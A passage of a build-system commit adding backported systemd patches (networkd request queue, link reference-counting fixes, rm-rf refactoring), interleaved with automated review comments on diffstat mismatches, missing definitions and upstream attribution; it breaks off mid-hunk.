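+@@ -105,6 +105,8 @@ sources = files('''
+ networkd-network.h
+ networkd-nexthop.c
+ networkd-nexthop.h
++ networkd-queue.c
++ networkd-queue.h
+ networkd-route.c
+ networkd-route.h
+ networkd-routing-policy-rule.c
+diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
+index 34359b2541..2f33305a27 100644
+--- a/src/network/networkd-link.c
++++ b/src/network/networkd-link.c
+@@ -30,6 +30,7 @@
+ #include "networkd-manager.h"
+ #include "networkd-ndisc.h"
+ #include "networkd-neighbor.h"
++#include "networkd-queue.h"
+ #include "networkd-radv.h"
+ #include "networkd-routing-policy-rule.h"
+ #include "networkd-wifi.h"
+
+@@ -2232,6 +2244,8 @@ static int link_reconfigure_internal(Link *link, sd_netlink_message *m, bool for
+ if (r < 0)
+ return r;
+
++ link_drop_requests(link);
++
+ r = link_drop_config(link);
+ if (r < 0)
+ return r;
+@@ -2664,6 +2678,8 @@ static int link_carrier_lost(Link *link) {
+ return r;
+ }
+
++ link_drop_requests(link);
++
+ r = link_drop_config(link);
+ if (r < 0)
+ return r;
+diff --git a/src/network/networkd-manager.c b/src/network/networkd-manager.c
+index 562ce5ca54..fd576169a9 100644
+--- a/src/network/networkd-manager.c
++++ b/src/network/networkd-manager.c
+@@ -34,6 +34,7 @@
+ #include "networkd-manager-bus.h"
+ #include "networkd-manager.h"
+ #include "networkd-network-bus.h"
++#include "networkd-queue.h"
+ #include "networkd-speed-meter.h"
+ #include "ordered-set.h"
+ #include "path-util.h"
+@@ -406,6 +407,10 @@ int manager_new(Manager **ret) {
+ if (r < 0)
+ return r;
+
++ r = sd_event_add_post(m->event, NULL, manager_process_requests, m);
++ if (r < 0)
++ return r;
++
+ r = manager_connect_rtnl(m);
+ if (r < 0)
+ return r;
+@@ -446,6 +451,8 @@ Manager* manager_free(Manager *m) {
+
+ free(m->state_file);
+
++ m->request_queue = ordered_set_free_with_destructor(m->request_queue, request_free);
++
+ while ((a = hashmap_first_key(m->dhcp6_prefixes)))
+ (void) dhcp6_prefix_remove(m, a);
+ m->dhcp6_prefixes = hashmap_free(m->dhcp6_prefixes);
+diff --git a/src/network/networkd-manager.h b/src/network/networkd-manager.h
+index 301b97c1a1..26e8802871 100644
+--- a/src/network/networkd-manager.h
++++ b/src/network/networkd-manager.h
+@@ -91,6 +91,8 @@ struct Manager {
+ usec_t speed_meter_usec_old;
+
+ bool dhcp4_prefix_root_cannot_set_table;
++
++ OrderedSet *request_queue;
+ };
+
+ int manager_new(Manager **ret);
+diff --git a/src/network/networkd-queue.c b/src/network/networkd-queue.c
+new file mode 100644
+index 0000000000..24bb2c845d
+--- /dev/null
++++ b/src/network/networkd-queue.c
+@@ -0,0 +1,121 @@
++/* SPDX-License-Identifier: LGPL-2.1-or-later */
++
++#include "networkd-address.h"
++#include "networkd-manager.h"
++#include "networkd-neighbor.h"
++#include "networkd-nexthop.h"
++#include "networkd-route.h"
++#include "networkd-routing-policy-rule.h"
++#include "networkd-queue.h"
++
++static void request_free_object(RequestType type, void *object) {
++ switch(type) {
++ default:
++ assert_not_reached("invalid request type.");
++ }
++}
++
++Request *request_free(Request *req) {
++ if (!req)
++ return NULL;
++
++ if (req->on_free)
++ req->on_free(req);
++ if (req->consume_object)
++ request_free_object(req->type, req->object);
++ if (req->link && req->link->manager)
++ ordered_set_remove(req->link->manager->request_queue, req);
++ link_unref(req->link);
++
++ return mfree(req);
++}
++
++DEFINE_TRIVIAL_CLEANUP_FUNC(Request*, request_free);
++
++void request_drop(Request *req) {
++ if (req->message_counter)
++ (*req->message_counter)--;
++
++ request_free(req);
++}
++
++int link_queue_request(
++ Link *link,
++ RequestType type,
++ void *object,
++ bool consume_object,
++ unsigned *message_counter,
++ link_netlink_message_handler_t netlink_handler,
++ Request **ret) {
++
++ _cleanup_(request_freep) Request *req = NULL;
++ int r;
++
++ assert(link);
++ assert(link->manager);
++ assert(type >= 0 && type < _REQUEST_TYPE_MAX);
++ assert(object);
++ assert(netlink_handler);
++
++ req = new(Request, 1);
++ if (!req) {
++ if (consume_object)
++ request_free_object(type, object);
++ return -ENOMEM;
++ }
++
++ *req = (Request) {
++ .link = link,
++ .type = type,
++ .object = object,
++ .consume_object = consume_object,
++ .message_counter = message_counter,
++ .netlink_handler = netlink_handler,
++ };
++
++ link_ref(link);
++
++ r = ordered_set_ensure_put(&link->manager->request_queue, NULL, req);
++ if (r < 0)
++ return r;
++
++ if (req->message_counter)
++ (*req->message_counter)++;
++
++ if (ret)
++ *ret = req;
++
++ TAKE_PTR(req);
++ return 0;
++}
++
++int manager_process_requests(sd_event_source *s, void *userdata) {
++ Manager *manager = userdata;
++ int r;
++
++ assert(manager);
++
++ for (;;) {
++ bool processed = false;
++ Request *req;
++ Iterator i;
++ ORDERED_SET_FOREACH(req, manager->request_queue, i) {
++ switch(req->type) {
++ default:
++ return -EINVAL;
++ }
++ if (r < 0)
++ link_enter_failed(req->link);
++ if (r > 0) {
++ ordered_set_remove(manager->request_queue, req);
++ request_free(req);
++ processed = true;
++ }
++ }
++
++ if (!processed)
++ break;
++ }
++
++ return 0;
++}
+diff --git a/src/network/networkd-queue.h b/src/network/networkd-queue.h
+new file mode 100644
+index 0000000000..4558ae548f
+--- /dev/null
++++ b/src/network/networkd-queue.h
+@@ -0,0 +1,42 @@
++/* SPDX-License-Identifier: LGPL-2.1-or-later */
++#pragma once
++
++#include "sd-event.h"
++
++#include "networkd-link.h"
++
++typedef struct Request Request;
++
++typedef int (*request_after_configure_handler_t)(Request*, void*);
++typedef void (*request_on_free_handler_t)(Request*);
++
++typedef enum RequestType {
++ _REQUEST_TYPE_MAX,
++ _REQUEST_TYPE_INVALID = -EINVAL,
++} RequestType;
++
++typedef struct Request {
++ Link *link;
++ RequestType type;
++ bool consume_object;
++ void *object;
++ void *userdata;
++ unsigned *message_counter;
++ link_netlink_message_handler_t netlink_handler;
++ request_after_configure_handler_t after_configure;
++ request_on_free_handler_t on_free;
++} Request;
++
++Request *request_free(Request *req);
++void request_drop(Request *req);
++
++int link_queue_request(
++ Link *link,
++ RequestType type,
++ void *object,
++ bool consume_object,
++ unsigned *message_counter,
++ link_netlink_message_handler_t netlink_handler,
++ Request **ret);
++
++int manager_process_requests(sd_event_source *s, void *userdata);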
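Review bot: The networkd-link.c hunks add calls to `link_drop_requests(link)` in link_reconfigure_internal() and link_carrier_lost(), but no hunk in this patch defines or declares that function; its definition only appears in network-also-drop-requests-when-link-enters-linger-state.patch. The diffstat lists 20 changed lines for networkd-link.c while the hunks carry five additions, so the definition seems to have been dropped while adapting the backport (inferred). The header should say so, for example `Comments: link_drop_requests() comes from network-also-drop-requests-when-link-enters-linger-state.patch, apply together`, or the definition should be restored here so the patch builds on its own. Both functions start and end outside their hunks.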
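diff --git a/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch b/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch
new file mode 100644
index 0000000000..4c402e7e55
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch
@@ -0,0 +1,50 @@
+From 56001f023305ea99329e27141d6e6067596491a9 Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Mon, 17 May 2021 15:32:57 +0900
+Subject: [PATCH] network: also drop requests when link enters linger state
+
+Otherwise, if link is removed, several references to the link in remain
+exist in requests.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/56001f023305ea99329e27141d6e6067596491a9]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/network/networkd-link.c | 24 +++++++++++++-----------
+ 1 file changed, 13 insertions(+), 11 deletions(-)
+
+diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
+index 67d01ac44d..b56c232eca 100644
+--- a/src/network/networkd-link.c
++++ b/src/network/networkd-link.c
+@@ -1771,6 +1771,18 @@ static void link_drop_from_master(Link *link, NetDev *netdev) {
+ link_unref(set_remove(master->slaves, link));
+ }
+
++static void link_drop_requests(Link *link) {
++ Request *req;
++ Iterator i;
++
++ assert(link);
++ assert(link->manager);
++
++ ORDERED_SET_FOREACH(req, link->manager->request_queue, i)
++ if (req->link == link)
++ request_drop(req);
++}
++
+ void link_drop(Link *link) {
+ if (!link)
+ return;
+@@ -1782,6 +1793,8 @@ void link_drop(Link *link) {
+ /* Drop all references from other links and manager. Note that async netlink calls may have
+ * references to the link, and they will be dropped when we receive replies. */
+
++ link_drop_requests(link);
++
+ link_free_carrier_maps(link);
+
+ if (link->network) {
+--
+2.17.1
+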
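Review bot: The patch header does not match the patch body: the diffstat says `13 insertions(+), 11 deletions(-)`, while the two hunks contain 14 added lines and no removals, so this is an adapted backport and not the upstream commit as cited in `Upstream-Status:`. A line under `Upstream-Status:` stating what was changed for this version would let a later reviewer compare it with the upstream commit; network-fix-Link-reference-counter-issue.patch has the same problem, its diffstat lists one file while the body also patches networkd-link.h. In the code, `link_drop_requests()` calls `request_drop(req)` inside `ORDERED_SET_FOREACH` over `request_queue`; `request_drop()` is defined outside this patch, so a comment such as `/* request_drop() removes only req from request_queue */` above the loop would record the assumption the iteration relies on.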
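diff --git a/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch b/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch
new file mode 100644
index 0000000000..a186bb4095
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch
@@ -0,0 +1,278 @@
+From cc2d7efc5ca09a7de4bec55e80476986839a655c Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Fri, 14 May 2021 15:58:15 +0900
+Subject: [PATCH] network: fix Link reference counter issue
+
+Previously, when link_new() fails, `link_unref()` was called, so,
+`Manager::links` may become dirty.
+This introduces `link_drop_or_unref()` and it will be called on
+failure.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/cc2d7efc5ca09a7de4bec55e80476986839a655c]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/network/networkd-link.c | 240 ++++++++++++++++++------------------
+ 1 file changed, 122 insertions(+), 118 deletions(-)
+
+diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
+index b56c232eca..d493afda4c 100644
+--- a/src/network/networkd-link.c
++++ b/src/network/networkd-link.c
+@@ -540,109 +540,6 @@ static int link_update_flags(Link *link,
+ return 0;
+ }
+
+-static int link_new(Manager *manager, sd_netlink_message *message, Link **ret) {
+- _cleanup_(link_unrefp) Link *link = NULL;
+- uint16_t type;
+- const char *ifname, *kind = NULL;
+- int r, ifindex;
+- unsigned short iftype;
+-
+- assert(manager);
+- assert(message);
+- assert(ret);
+-
+- /* check for link kind */
+- r = sd_netlink_message_enter_container(message, IFLA_LINKINFO);
+- if (r == 0) {
+- (void) sd_netlink_message_read_string(message, IFLA_INFO_KIND, &kind);
+- r = sd_netlink_message_exit_container(message);
+- if (r < 0)
+- return r;
+- }
+-
+- r = sd_netlink_message_get_type(message, &type);
+- if (r < 0)
+- return r;
+- else if (type != RTM_NEWLINK)
+- return -EINVAL;
+-
+- r = sd_rtnl_message_link_get_ifindex(message, &ifindex);
+- if (r < 0)
+- return r;
+- else if (ifindex <= 0)
+- return -EINVAL;
+-
+- r = sd_rtnl_message_link_get_type(message, &iftype);
+- if (r < 0)
+- return r;
+-
+- r = sd_netlink_message_read_string(message, IFLA_IFNAME, &ifname);
+- if (r < 0)
+- return r;
+-
+- link = new(Link, 1);
+- if (!link)
+- return -ENOMEM;
+-
+- *link = (Link) {
+- .n_ref = 1,
+- .manager = manager,
+- .state = LINK_STATE_PENDING,
+- .ifindex = ifindex,
+- .iftype = iftype,
+-
+- .n_dns = (unsigned) -1,
+- .dns_default_route = -1,
+- .llmnr = _RESOLVE_SUPPORT_INVALID,
+- .mdns = _RESOLVE_SUPPORT_INVALID,
+- .dnssec_mode = _DNSSEC_MODE_INVALID,
+- .dns_over_tls_mode = _DNS_OVER_TLS_MODE_INVALID,
+- };
+-
+- link->ifname = strdup(ifname);
+- if (!link->ifname)
+- return -ENOMEM;
+-
+- if (kind) {
+- link->kind = strdup(kind);
+- if (!link->kind)
+- return -ENOMEM;
+- }
+-
+- r = sd_netlink_message_read_u32(message, IFLA_MASTER, (uint32_t *)&link->master_ifindex);
+- if (r < 0)
+- log_link_debug_errno(link, r, "New device has no master, continuing without");
+-
+- r = sd_netlink_message_read_ether_addr(message, IFLA_ADDRESS, &link->mac);
+- if (r < 0)
+- log_link_debug_errno(link, r, "MAC address not found for new device, continuing without");
+-
+- if (asprintf(&link->state_file, "/run/systemd/netif/links/%d", link->ifindex) < 0)
+- return -ENOMEM;
+-
+- if (asprintf(&link->lease_file, "/run/systemd/netif/leases/%d", link->ifindex) < 0)
+- return -ENOMEM;
+-
+- if (asprintf(&link->lldp_file, "/run/systemd/netif/lldp/%d", link->ifindex) < 0)
+- return -ENOMEM;
+-
+- r = hashmap_ensure_allocated(&manager->links, NULL);
+- if (r < 0)
+- return r;
+-
+- r = hashmap_put(manager->links, INT_TO_PTR(link->ifindex), link);
+- if (r < 0)
+- return r;
+-
+- r = link_update_flags(link, message, false);
+- if (r < 0)
+- return r;
+-
+- *ret = TAKE_PTR(link);
+-
+- return 0;
+-}
+-
+ void link_ntp_settings_clear(Link *link) {
+ link->ntp = strv_free(link->ntp);
+ }
+@@ -2030,9 +1927,9 @@ static void link_drop_requests(Link *lin
+ request_drop(req);
+ }
+
+-void link_drop(Link *link) {
++Link *link_drop(Link *link) {
+ if (!link)
+- return;
++ return NULL;
+
+ assert(link->manager);
+
+@@ -2057,7 +1954,7 @@ void link_drop(Link *link) {
+
+ /* The following must be called at last. */
+ assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link);
+- link_unref(link);
++ return link_unref(link);
+ }
+
+ static int link_joined(Link *link) {
+@@ -3295,6 +3192,112 @@ ipv4ll_address_fail:
+
+ return 0;
+ }
++
++static Link *link_drop_or_unref(Link *link) {
++ if (!link)
++ return NULL;
++ if (!link->manager)
++ return link_unref(link);
++ return link_drop(link);
++}
++
++DEFINE_TRIVIAL_CLEANUP_FUNC(Link*, link_drop_or_unref);
++
++static int link_new(Manager *manager, sd_netlink_message *message, Link **ret) {
++ _cleanup_(link_drop_or_unrefp) Link *link = NULL;
++ uint16_t type;
++ _cleanup_free_ char *ifname = NULL, *kind = NULL;
++ int r, ifindex;
++ unsigned short iftype;
++
++ assert(manager);
++ assert(message);
++ assert(ret);
++
++ r = sd_netlink_message_get_type(message, &type);
++ if (r < 0)
++ return r;
++ else if (type != RTM_NEWLINK)
++ return -EINVAL;
++
++ r = sd_rtnl_message_link_get_ifindex(message, &ifindex);
++ if (r < 0)
++ return r;
++ else if (ifindex <= 0)
++ return -EINVAL;
++
++ r = sd_rtnl_message_link_get_type(message, &iftype);
++ if (r < 0)
++ return r;
++
++ r = sd_netlink_message_read_string_strdup(message, IFLA_IFNAME, &ifname);
++ if (r < 0)
++ return r;
++
++ /* check for link kind */
++ r = sd_netlink_message_enter_container(message, IFLA_LINKINFO);
++ if (r >= 0) {
++ (void) sd_netlink_message_read_string_strdup(message, IFLA_INFO_KIND, &kind);
++ r = sd_netlink_message_exit_container(message);
++ if (r < 0)
++ return r;
++ }
++
++ link = new(Link, 1);
++ if (!link)
++ return -ENOMEM;
++
++ *link = (Link) {
++ .n_ref = 1,
++ .state = LINK_STATE_PENDING,
++ .ifindex = ifindex,
++ .iftype = iftype,
++ .ifname = TAKE_PTR(ifname),
++ .kind = TAKE_PTR(kind),
++
++ .n_dns = (unsigned) -1,
++ .dns_default_route = -1,
++ .llmnr = _RESOLVE_SUPPORT_INVALID,
++ .mdns = _RESOLVE_SUPPORT_INVALID,
++ .dnssec_mode = _DNSSEC_MODE_INVALID,
++ .dns_over_tls_mode = _DNS_OVER_TLS_MODE_INVALID,
++ };
++
++ r = hashmap_ensure_allocated(&manager->links, NULL);
++ if (r < 0)
++ return r;
++
++ r = hashmap_put(manager->links, INT_TO_PTR(link->ifindex), link);
++ if (r < 0)
++ return r;
++
++ link->manager = manager;
++
++ r = sd_netlink_message_read_u32(message, IFLA_MASTER, (uint32_t*) &link->master_ifindex);
++ if (r < 0)
++ log_link_debug_errno(link, r, "New device has no master, continuing without");
++
++ r = sd_netlink_message_read_ether_addr(message, IFLA_ADDRESS, &link->mac);
++ if (r < 0)
++ log_link_debug_errno(link, r, "MAC address not found for new device, continuing without");
++
++ if (asprintf(&link->state_file, "/run/systemd/netif/links/%d", link->ifindex) < 0)
++ return -ENOMEM;
++
++ if (asprintf(&link->lease_file, "/run/systemd/netif/leases/%d", link->ifindex) < 0)
++ return -ENOMEM;
++
++ if (asprintf(&link->lldp_file, "/run/systemd/netif/lldp/%d", link->ifindex) < 0)
++ return -ENOMEM;
++
++ r = link_update_flags(link, message, false);
++ if (r < 0)
++ return r;
++
++ *ret = TAKE_PTR(link);
++
++ return 0;
++}
+
+ int link_add(Manager *m, sd_netlink_message *message, Link **ret) {
+ _cleanup_(sd_device_unrefp) sd_device *device = NULL;
+
+--- a/src/network/networkd-link.h 2021-09-02 18:04:16.900542857 +0530
++++ b/src/network/networkd-link.h 2021-09-02 18:18:56.776571563 +0530
+@@ -175,7 +175,7 @@ DEFINE_TRIVIAL_DESTRUCTOR(link_netlink_d
+
+ int link_get(Manager *m, int ifindex, Link **ret);
+ int link_add(Manager *manager, sd_netlink_message *message, Link **ret);
+-void link_drop(Link *link);
++Link *link_drop(Link *link);
+
+ int link_down(Link *link, link_netlink_message_handler_t callback);
+
+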
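Review bot: In the new `link_new()`, `link->manager = manager;` is assigned only after `hashmap_put()` has succeeded, and that ordering is what lets `link_drop_or_unref()` choose between `link_unref()` and `link_drop()` on the error paths, yet nothing in the code says so. If the assignment moved back into the `*link = (Link) { ... }` initializer, a failed `hashmap_put()` would reach `link_drop()` and its `assert_se(hashmap_remove(...) == link)` for an entry this Link never owned. I would add `/* Set only once the link is in manager->links; link_drop_or_unref() keys on this. */` above the assignment. The error returns after that point now run the full `link_drop()` on a partly initialised Link (for example before `state_file` is allocated); most of `link_drop()` is outside these hunks, so please confirm it tolerates that.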
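diff --git a/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch b/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch
new file mode 100644
index 0000000000..65bdc611df
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch
@@ -0,0 +1,67 @@
+From 63130eb36dc51e4fd50716c585f98ebe456ca7cf Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Mon, 17 May 2021 15:40:15 +0900
+Subject: [PATCH] network: merge link_drop() and link_detach_from_manager()
+
+link_detach_from_manager() is only called by link_drop(). It is not
+necessary to split such tiny function.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/63130eb36dc51e4fd50716c585f98ebe456ca7cf]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/network/networkd-link.c | 27 ++++++++++++---------------
+ 1 file changed, 12 insertions(+), 15 deletions(-)
+
+diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
+index 9d30e16b0a..67d01ac44d 100644
+--- a/src/network/networkd-link.c
++++ b/src/network/networkd-link.c
+@@ -2019,24 +2019,17 @@ static void link_drop_from_master(Link *link, NetDev *netdev) {
+ link_unref(set_remove(master->slaves, link));
+ }
+
+-static void link_detach_from_manager(Link *link) {
+- if (!link || !link->manager)
+- return;
+-
+- link_unref(set_remove(link->manager->links_requesting_uuid, link));
+- link_clean(link);
+-
+- /* The following must be called at last. */
+- assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link);
+- link_unref(link);
+-}
+-
+ void link_drop(Link *link) {
+- if (!link || link->state == LINK_STATE_LINGER)
++ if (!link)
+ return;
+
++ assert(link->manager);
++
+ link_set_state(link, LINK_STATE_LINGER);
+
++ /* Drop all references from other links and manager. Note that async netlink calls may have
++ * references to the link, and they will be dropped when we receive replies. */
++
+ link_free_carrier_maps(link);
+
+ if (link->network) {
+@@ -2044,10 +2037,14 @@ void link_drop(Link *link) {
+ link_drop_from_master(link, link->network->bond);
+ }
+
+- log_link_debug(link, "Link removed");
++ link_unref(set_remove(link->manager->links_requesting_uuid, link));
+
+ (void) unlink(link->state_file);
+- link_detach_from_manager(link);
++ link_clean(link);
++
++ /* The following must be called at last. */
++ assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link);
++ link_unref(link);
+ }
+
+ static int link_joined(Link *link) {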
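Review bot: `link_drop()` loses its `link->state == LINK_STATE_LINGER` early return, so a second call on the same Link is no longer a no-op and would reach `assert_se(hashmap_remove(link->manager->links, ...) == link)` after the entry is already gone. The old `!link->manager` silent return likewise became `assert(link->manager)`. The callers are outside this hunk, so whether any of them can drop a link twice cannot be checked here. A comment on the function such as `/* Must be called exactly once, and only for a Link registered in manager->links. */` would make the new contract explicit. The hunk also removes `log_link_debug(link, "Link removed")`, which drops the explicit removal message from the debug log.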
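diff --git a/meta/recipes-core/systemd/systemd/rm-rf-optionally-fsync-after-removing-directory-tree.patch b/meta/recipes-core/systemd/systemd/rm-rf-optionally-fsync-after-removing-directory-tree.patch
new file mode 100644
index 0000000000..b860da008c
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/rm-rf-optionally-fsync-after-removing-directory-tree.patch
@@ -0,0 +1,35 @@
+Backport of the following upstream commit:
+From bdfe7ada0d4d66e6d6e65f2822acbb1ec230f9c2 Mon Sep 17 00:00:00 2001
+From: Lennart Poettering <lennart@poettering.net>
+Date: Tue, 5 Oct 2021 10:32:56 +0200
+Subject: [PATCH] rm-rf: optionally fsync() after removing directory tree
+
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/basic/rm-rf.c | 3 +++
+ src/basic/rm-rf.h | 1 +
+ 2 files changed, 4 insertions(+)
+
+--- a/src/basic/rm-rf.c
++++ b/src/basic/rm-rf.c
+@@ -161,6 +161,9 @@
+ ret = r;
+ }
+
++ if (FLAGS_SET(flags, REMOVE_SYNCFS) && syncfs(dirfd(d)) < 0 && ret >= 0)
++ ret = -errno;
++
+ return ret;
+ }
+
+--- a/src/basic/rm-rf.h
++++ b/src/basic/rm-rf.h
+@@ -11,6 +11,7 @@
+ REMOVE_PHYSICAL = 1 << 2, /* If not set, only removes files on tmpfs, never physical file systems */
+ REMOVE_SUBVOLUME = 1 << 3, /* Drop btrfs subvolumes in the tree too */
+ REMOVE_MISSING_OK = 1 << 4, /* If the top-level directory is missing, ignore the ENOENT for it */
++ REMOVE_SYNCFS = 1 << 7, /* syncfs() the root of the specified directory after removing everything in it */
+ } RemoveFlags;
+
+ int rm_rf_children(int fd, RemoveFlags flags, const struct stat *root_dev);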
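Review bot: The `Upstream-Status:` line cites an Ubuntu source tarball fetched over plain `http://` and not the upstream commit `bdfe7ada0d4d66e6d6e65f2822acbb1ec230f9c2` that the header itself names, so the backport cannot be compared against its origin once that tarball leaves the pool. I would reference the upstream commit there and mention the Ubuntu package only as the source of the adaptation; rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch carries the same kind of header. In the code, `REMOVE_SYNCFS = 1 << 7` skips bits 5 and 6, presumably to match upstream's numbering; a comment saying those two values are reserved would stop a later local change from reusing them.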
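diff --git a/meta/recipes-core/systemd/systemd/rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch b/meta/recipes-core/systemd/systemd/rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch
new file mode 100644
index 0000000000..f80e6433c6
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch
@@ -0,0 +1,318 @@
+Backport of the following upstream commit:
+From 96906b22417c65d70933976e0ee920c70c9113a4 Mon Sep 17 00:00:00 2001
+From: Lennart Poettering <lennart@poettering.net>
+Date: Tue, 26 Jan 2021 16:30:06 +0100
+Subject: [PATCH] rm-rf: refactor rm_rf_children(), split out body of directory
+ iteration loop
+
+This splits out rm_rf_children_inner() as body of the loop. We can use
+that to implement rm_rf_child() for deleting one specific entry in a
+directory.
+
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/basic/rm-rf.c | 223 ++++++++++++++++++++++++++-------------------
+ src/basic/rm-rf.h | 3 +-
+ 2 files changed, 131 insertions(+), 95 deletions(-)
+
+--- a/src/basic/rm-rf.c
++++ b/src/basic/rm-rf.c
+@@ -19,138 +19,153 @@
+ #include "stat-util.h"
+ #include "string-util.h"
+
++/* We treat tmpfs/ramfs + cgroupfs as non-physical file sytems. cgroupfs is similar to tmpfs in a way after
++ * all: we can create arbitrary directory hierarchies in it, and hence can also use rm_rf() on it to remove
++ * those again. */
+ static bool is_physical_fs(const struct statfs *sfs) {
+ return !is_temporary_fs(sfs) && !is_cgroup_fs(sfs);
+ }
+
+-int rm_rf_children(int fd, RemoveFlags flags, struct stat *root_dev) {
++static int rm_rf_children_inner(
++ int fd,
++ const char *fname,
++ int is_dir,
++ RemoveFlags flags,
++ const struct stat *root_dev) {
++
++ struct stat st;
++ int r;
++
++ assert(fd >= 0);
++ assert(fname);
++
++ if (is_dir < 0 || (is_dir > 0 && (root_dev || (flags & REMOVE_SUBVOLUME)))) {
++
++ r = fstatat(fd, fname, &st, AT_SYMLINK_NOFOLLOW);
++ if (r < 0)
++ return r;
++
++ is_dir = S_ISDIR(st.st_mode);
++ }
++
++ if (is_dir) {
++ _cleanup_close_ int subdir_fd = -1;
++ int q;
++
++ /* if root_dev is set, remove subdirectories only if device is same */
++ if (root_dev && st.st_dev != root_dev->st_dev)
++ return 0;
++
++ /* Stop at mount points */
++ r = fd_is_mount_point(fd, fname, 0);
++ if (r < 0)
++ return r;
++ if (r > 0)
++ return 0;
++
++ if ((flags & REMOVE_SUBVOLUME) && st.st_ino == 256) {
++
++ /* This could be a subvolume, try to remove it */
++
++ r = btrfs_subvol_remove_fd(fd, fname, BTRFS_REMOVE_RECURSIVE|BTRFS_REMOVE_QUOTA);
++ if (r < 0) {
++ if (!IN_SET(r, -ENOTTY, -EINVAL))
++ return r;
++
++ /* ENOTTY, then it wasn't a btrfs subvolume, continue below. */
++ } else
++ /* It was a subvolume, done. */
++ return 1;
++ }
++
++ subdir_fd = openat(fd, fname, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
++ if (subdir_fd < 0)
++ return -errno;
++
++ /* We pass REMOVE_PHYSICAL here, to avoid doing the fstatfs() to check the file system type
++ * again for each directory */
++ q = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
++
++ r = unlinkat(fd, fname, AT_REMOVEDIR);
++ if (r < 0)
++ return r;
++ if (q < 0)
++ return q;
++
++ return 1;
++
++ } else if (!(flags & REMOVE_ONLY_DIRECTORIES)) {
++ r = unlinkat(fd, fname, 0);
++ if (r < 0)
++ return r;
++
++ return 1;
++ }
++
++ return 0;
++}
++
++int rm_rf_children(
++ int fd,
++ RemoveFlags flags,
++ const struct stat *root_dev) {
++
+ _cleanup_closedir_ DIR *d = NULL;
+ struct dirent *de;
+ int ret = 0, r;
+- struct statfs sfs;
+
+ assert(fd >= 0);
+
+ /* This returns the first error we run into, but nevertheless tries to go on. This closes the passed
+- * fd, in all cases, including on failure.. */
++ * fd, in all cases, including on failure. */
++
++ d = fdopendir(fd);
++ if (!d) {
++ safe_close(fd);
++ return -errno;
++ }
+
+ if (!(flags & REMOVE_PHYSICAL)) {
++ struct statfs sfs;
+
+- r = fstatfs(fd, &sfs);
+- if (r < 0) {
+- safe_close(fd);
++ if (fstatfs(dirfd(d), &sfs) < 0)
+ return -errno;
+ }
+
+ if (is_physical_fs(&sfs)) {
+- /* We refuse to clean physical file systems with this call,
+- * unless explicitly requested. This is extra paranoia just
+- * to be sure we never ever remove non-state data. */
++ /* We refuse to clean physical file systems with this call, unless explicitly
++ * requested. This is extra paranoia just to be sure we never ever remove non-state
++ * data. */
++
+ _cleanup_free_ char *path = NULL;
+
+ (void) fd_get_path(fd, &path);
+- log_error("Attempted to remove disk file system under \"%s\", and we can't allow that.",
+- strna(path));
+-
+- safe_close(fd);
+- return -EPERM;
++ return log_error_errno(SYNTHETIC_ERRNO(EPERM),
++ "Attempted to remove disk file system under \"%s\", and we can't allow that.",
++ strna(path));
+ }
+ }
+
+- d = fdopendir(fd);
+- if (!d) {
+- safe_close(fd);
+- return errno == ENOENT ? 0 : -errno;
+- }
+-
+ FOREACH_DIRENT_ALL(de, d, return -errno) {
+- bool is_dir;
+- struct stat st;
++ int is_dir;
+
+ if (dot_or_dot_dot(de->d_name))
+ continue;
+
+- if (de->d_type == DT_UNKNOWN ||
+- (de->d_type == DT_DIR && (root_dev || (flags & REMOVE_SUBVOLUME)))) {
+- if (fstatat(fd, de->d_name, &st, AT_SYMLINK_NOFOLLOW) < 0) {
+- if (ret == 0 && errno != ENOENT)
+- ret = -errno;
+- continue;
+- }
+-
+- is_dir = S_ISDIR(st.st_mode);
+- } else
+- is_dir = de->d_type == DT_DIR;
+-
+- if (is_dir) {
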